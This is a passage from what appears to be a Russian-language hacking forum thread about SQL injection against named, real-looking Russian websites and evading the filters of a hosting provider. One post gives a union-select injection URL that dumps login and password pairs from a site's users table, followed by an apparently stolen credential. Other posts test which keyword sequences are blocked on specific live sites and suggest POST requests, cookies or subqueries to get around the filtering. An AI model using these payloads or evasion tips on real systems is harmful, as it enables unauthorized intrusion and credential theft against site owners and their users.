Да йопт, чё пробовать то))) Пост работает, сам проверял
Кстати там ещё фильтруется слово /etc/passwd
Вобщем вот
http://www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+concat_ws(':',login,password)+from+ users/*
viktor:1940
А если параметр в скрипте только через $_GET передается, есть возможность обхода фильтрации?
Довольно интересно...))
Запрос откидывается, если в запросе (масло маслянное) присутствуют Union, Select, From, именно в такой последовательности...
Тут думаю или пост, или пробовать подзапросы
На одном из серверов Sweb-a фильтруется даже select from,
например http://www.74region.ru/?select%20from ,
а на некоторых не фильтруется последовательность
"select, from, union, select".
Пора бы уже запомнить что на sweb фильтруется from /etc/ passwd и еще несколько подобных выражений.. обходится все посылкой пост запросов, кукисов ..и тд
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Пора бы уже запомнить что на sweb фильтруется from /etc/ passwd и еще несколько подобных выражений.. обходится все посылкой пост запросов, кукисов ..и тд
На нкоторых серверах sweb не фильтруется "from".
Пример.
http://1-avto.com/car.html?select%20from не фильтруется
а http://1-avto.com/car.html?union%20select%20from
фильтруется.
А по поводу пост запросов и т.д., в некоторых скриптах только гет проходит.